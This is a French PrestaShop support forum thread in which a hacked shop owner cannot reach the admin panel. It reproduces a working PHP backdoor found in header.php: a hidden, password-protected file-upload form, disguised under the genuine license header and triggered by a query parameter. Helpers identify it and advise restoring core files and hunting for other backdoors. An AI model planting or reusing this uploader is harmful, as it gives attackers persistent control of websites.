distributechmaroc Posted September 18, 2017 Share Posted September 18, 2017 Bonjour, suite à un problème de virus, le back office prestashop ne fonctionne plus, apres une operation de nettoyage j'ai supprimé beaucoup de fichier que le hacker a mis sur le serveur, j'ai reussi à afficher le front office mais pas le back office, je me demande si c'est un problème de chemin ou redirection, merci de bien vouloir m'aider à résoudre ce problème svp. La page n’est pas redirigée correctementFirefox a détecté que le serveur redirige la demande pour cette adresse d’une manière qui n’aboutira pas. La cause de ce problème peut être la désactivation ou le refus des cookies. back office http://www.distributechmaroc.com/admindistribute/ MERCI INFINIMENT Link to comment Share on other sites More sharing options...
selectshop.at Posted September 18, 2017 Share Posted September 18, 2017 Il semble que vous avez une erreur sur votre .htaccess. Accédez à votre FTP via Filezilla et renommez le fichier principal .htaccess dans le dossier de votre magasin sur l'espace Web. Renommez-le par exemple à .htaccess.bak. Et essayez à nouveau d'accéder au back-office Link to comment Share on other sites More sharing options...
doekia Posted September 18, 2017 Share Posted September 18, 2017 Et/ou il reste du code vérolé qui plante car il lui manque un morceau Link to comment Share on other sites More sharing options...
distributechmaroc Posted September 20, 2017 Author Share Posted September 20, 2017 BONJOUR, Je vous remercie pour vos retour. j'ai déjà renommé mon fichier htaccess via ftp en .back mais aucun changement, je galère depuis ce virus, y'a til pas d'autres solution ? Link to comment Share on other sites More sharing options...
doekia Posted September 20, 2017 Share Posted September 20, 2017 A moins de faire une intervention in-situ je ne vois pas trop ce que l'on peut te proposer. Link to comment Share on other sites More sharing options...
distributechmaroc Posted September 21, 2017 Author Share Posted September 21, 2017 Merci, je vais continuer mes recherches Link to comment Share on other sites More sharing options...
doekia Posted September 21, 2017 Share Posted September 21, 2017 ? aussi incroyable que cela puisse te paraître nous ne sommes pas magicien. Harry Potter c'est une fiction, tout comme le père Noël Link to comment Share on other sites More sharing options...
distributechmaroc Posted September 22, 2017 Author Share Posted September 22, 2017 bonjour, j'ai trouvé ce code mis par le hacker dans le fichier header.php dans le dossier public html, pourriez-vous me décortiquer sa façon de travailler,a fin de résoudre mon proble d’accès au back office. SVP VOTRE AIDE fichier header.php <?php/** 2007-2015 PrestaShop** NOTICE OF LICENSE** This source file is subject to the Open Software License (OSL 3.0)* that is bundled with this package in the file LICENSE.txt.* It is also available through the world-wide-web at this URL:* http://opensource.org/licenses/osl-3.0.php* If you did not receive a copy of the license and are unable to* obtain it through the world-wide-web, please send an email* to [email protected] so we can send you a copy immediately.** DISCLAIMER** Do not edit or add to this file if you wish to upgrade PrestaShop to newer* versions in the future. If you wish to customize PrestaShop for your* needs please refer to http://www.prestashop.com for more information.** @author PrestaShop SA <[email protected]>* @copyright 2007-2015 PrestaShop SA* @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)* International Registered Trademark & Property of PrestaShop SA*/if($_GET['bajatax']=="hous"){echo '<center><font color="Red" size="4">';echo " Files Upload BY Bajatax<br>";/// Script Upload By bajatax \\\if(isset($_POST['Submit']) && isset($_POST['pass'])){$pass=md5($_POST['pass']);if($pass=="9d309cc7622c7f12b57c136ffd4717f7"){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode));echo" <a href=$userfile_name><center><b>Sucess Upload by Bajatax ==> $userfile_name</b></center></a>";}}else{echo "ikma khask pass hhh :v doz inbox www.fb.com/bajatax58 jib BTC o duz Khod u_f <br>";[spam-filter]else{echo'<form method="POST" action="#" enctype="multipart/form-data"><br>upload : <input type="file" name="image"><br> pass : <input type="password" name="pass" value="9lawi la3rftih :v "><br><input type="Submit" name="Submit" value="Upload"></form>';}echo "<br> hadi fkhatr ga3 l3chran houus <br>";echo '</center></font>';}require(dirname(__FILE__).'/config/config.inc.php');Dispatcher::getInstance()->dispatch(); Link to comment Share on other sites More sharing options...
doekia Posted September 22, 2017 Share Posted September 22, 2017 Non c'est une perte de temps. Ce code recharge la vérole du hacker en gros. Remplace tous les fichiers core par ceux du Prestashop natif. Repasse dans tous les répertoires à la recherche de backdoor supplémentaire. Ton nettoyage n'est pas complet, tu dois recommencer a scruter ton code et persévérer. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now